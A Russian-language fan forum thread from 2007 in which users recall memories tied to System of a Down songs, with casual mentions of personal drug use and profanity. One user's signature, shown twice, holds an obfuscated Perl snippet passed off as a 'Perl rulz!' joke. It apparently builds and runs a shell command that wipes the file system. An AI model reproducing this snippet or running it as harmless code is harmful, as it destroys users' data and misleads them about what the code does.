Добавлено: Пн Янв 29, 2007 5:33 am Заголовок сообщения: Ассоциации песен
Я подумал, что можно было бы создать такую тему, потому что, например, у меня некоторые песни очень конкретно ассоциируются с какими-нибудь людьми, событиями и т.д.
Вот песня Spiders у меня часто ассоциируется с аварией на Чернобыльской АС ( )... Я как раз грузился на эту тему всякими документами, сводками и прочей хуйнёй когда первые разы слушал песню. И у меня иногда прям целый клип в башке крутится, как крыша реактора подлетает в воздух от взрыва, зарево, пожар, сирена, ну там, всякая такая фигня...
Ego Brain вообще сильно напоминает о том коротком времени, когда я снимал в Питере комнату, и как первый раз нажрался мускатного ореха и в невменяемом состоянии поехал в паспортный стол...
Highway Song - вспоминаю дядю, который сейчас сидит второй раз "за изготовление, распространение" и что там ему ещё понавешали. Хотя, блять, какое там "распространение" - обычный нарик мелкий. Вобщем, как говорится - "Minor drug offenders fill your prisons, you don't even flinch"... Помню как он в Highway Song сидел втыкался. Под эфедрином. Я то сам в основном только по траве, ну грибы, орехи можно, колёса хавал кое-какие... Так что он от меня скрывал, а я ему верил, думал, что завязал... А он сцука, столько денег у меня попиздил.
Ну и Chop Suey! - первая услышанная песня - ассоциируется у меня с полной кастрюлей дико пручего молока. _________________ But all I want is you
мне просто щас в голову ниче не идет по этому поводу, как вспомнится чтото напишу обязательно _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
science, я всегда почему-то вспоминаю под нее лето 2004, хотя ничего особенного в нем не было. но почему-то оно мне запомнилось.
innervision, ну эт вообще что-то неописуемое, мож у абсурда взять че-нить похавать, чтобы потом вам это объяснить.
spiders, ну под нее я вообще вижу всякие ужасы.
metro, почему-то ассоциации с францией, хотя...вот вроде я ее тм не слушала, с собой были тока грин дэй(святотатство, можете сказать вы), кста, нимрод(ну эт для поклонников зеленого). я помню, что нашла еще магазин с рок атрибутикой, там был системовский флаг. "где они берут такие страшные фотографии?"-, была моя мысль.
у меня мармалад, метро, и псих с бдо02 ассоциируется тоже с весной/летом 2004, я помню был тогда ремонт и я в другую комнату переехал вмесе с компом, и вот тогда еще в колледже учился, и редких песен не слышал еще, а потом вот как раз в то время первый раз скачал эти все редкие тогда еще песни, вот, такая история _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
а у меня шимми ассоциируется с падением со скейта,я тогда очень сильно отбил позвоночник и ободрал всю спину,и минут 10 просто лежал на асфальте и не мог ничего сказать и подняться тоже не мог,было такое ощущение что у меня руки и ноги отнялись...
в момент падения в плеера играла эта песня)) _________________ АЙС
Absurd
ты меня плохо знаешь. *и тут не в тему мне вспомнилось...* меня один раз пытались напоить одноклассники, притом, что я трезвенник стопроц. потом ходили со словами "а видок-то у нее бухой". потом многих из них дружно блевало, половина еще не помнила вообще вечера, кто-то потом ходил зигзагом и одна евгения сергеевна после дозы выпивки(ну мож и не особо большой) была трезвенькой...
У меня тоже. Хотя я там вообще не был Это из за строчек:
"I was on a Paris train"
и
"Saw the mood we spoke in France"
а теперь всегда вспоминаю метро в париже, когда щас пик в питере.
летом 2004 ничего такого не было. просто я просиживала в нете 5-9 часов, качая всяк хрень с системой(нет, меня когда-нибудь точно прибьют большие фанаты)
летом 2004 ничего такого не было. просто я просиживала в нете 5-9 часов, качая всяк хрень с системой(нет, меня когда-нибудь точно прибьют большие фанаты)
надеюсь их тут нет.) _________________ Fortuna non penis in manus non recipe
Добавлено: Пт Фев 02, 2007 9:00 am Заголовок сообщения:
Absurd писал(а):
ну типа здесь именно поклонники, а не фанаты.
Хотя с первого взгляда думается шо именно фаны! Стоко концертов, такой дискографии, объема инфы я нигде не видел! _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!